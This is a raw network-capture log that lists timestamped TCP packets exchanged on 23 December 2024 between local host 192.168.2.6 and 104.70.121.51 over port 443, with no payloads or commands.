                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:19.699419022 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:19.699482918 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:19.699496031 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:19.699532986 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:19.699546099 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:19.699558973 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:19.699570894 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:19.699815035 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:19.699827909 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:19.699839115 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:19.699853897 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:19.699866056 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:19.699879885 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:19.700026035 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:19.700036049 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:19.700445890 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:19.727051973 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:19.727911949 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.043685913 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.051363945 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.051821947 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.051839113 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.051856041 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.051868916 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.052131891 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.052154064 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.052169085 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.052181959 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.079230070 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.086357117 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.392573118 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.401662111 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.409686089 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.410448074 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.410480022 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.410492897 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.410542011 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.410554886 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.410634995 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.410687923 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.410770893 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.410839081 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.410995007 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.411007881 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.411173105 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.411185980 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.411197901 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.411214113 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.411236048 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.411251068 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.411264896 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.411290884 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.411303997 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.422158957 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.422189951 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.422204018 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.422301054 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.422343016 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.422358036 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.422508955 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.422523022 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.422537088 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.422550917 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.422558069 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.428601980 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.428617954 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.428630114 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.428728104 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.428740978 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.428752899 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.428766012 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.428824902 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.428837061 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.428848982 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.428880930 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.437258005 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.437392950 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.437628984 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.437741041 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.437799931 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.437815905 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.437946081 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.437963963 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.437975883 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.437988997 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.438155890 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.444144011 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.444351912 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.444606066 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.483725071 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.751519918 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.806716919 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.812834024 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.813541889 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.813565969 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.813580036 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.813596010 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.813610077 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.813625097 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.813638926 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.813649893 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.813657999 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.813828945 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:20.838599920 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.152973890 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.161694050 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.161936998 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.162034988 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.162040949 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.162080050 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.162163973 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.162175894 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.162245989 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.162293911 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.162307978 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.162321091 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.162565947 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.162576914 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.163103104 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.181946039 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.497112036 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.502921104 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.503160954 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.503237009 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.503329992 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.503370047 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.503384113 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.503412962 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.503427029 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.503442049 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.503633022 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.503644943 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.503657103 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.503753901 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.503768921 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.503876925 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.503940105 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.503952026 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.503964901 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.503978014 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.504002094 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.504097939 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.511845112 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.511872053 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.511883974 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.511895895 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.511907101 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.511919022 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.511933088 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.511945963 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.511970043 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.511982918 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.512331009 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.520682096 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.520762920 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.520776033 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.520849943 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.520867109 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.521064997 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.521095991 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.521109104 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.521131992 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.521282911 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.521296024 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.529222012 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.529285908 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.529298067 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.529443026 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.529454947 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.529468060 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.529557943 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.529620886 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.529673100 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.529685974 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.529699087 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.538363934 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.538378954 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.538552046 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.538563013 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.538573980 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.538595915 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.538640022 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.538697004 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.538708925 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.538719893 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.539026976 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.546120882 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.546155930 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.546170950 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.546184063 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.546222925 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.546237946 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.546268940 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.546284914 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.546447992 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.546463013 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.546475887 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.556785107 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.556809902 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.556828022 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.556858063 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.556879997 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.556912899 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.556924105 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.557162046 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.557184935 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.557198048 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.557209969 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.562576056 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.562608004 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.562621117 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.562733889 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.562803984 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.562818050 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.562856913 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.562980890 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.563106060 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.563118935 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.563132048 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.570935011 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.570955038 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.571191072 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.693022013 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:21.841545105 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.008569956 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.012254953 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.012559891 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.012641907 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.012660980 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.012674093 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.012685061 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.012697935 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.012706995 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.035659075 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.349833012 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.356657028 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.356987000 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.357084990 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.357098103 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.357112885 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.357124090 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.357161045 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.387137890 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.387833118 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.696652889 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.702377081 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.707549095 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.707598925 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.707648993 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.707662106 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.707969904 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:22.718606949 CET52290443192.168.2.6104.70.121.51
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:23.034332991 CET44352290104.70.121.51192.168.2.6
                                                                                                                                                                                                                                                                                                      Dec 23, 2024 17:15:23.040553093 CET44352290104.70.121.51192.168.2.6
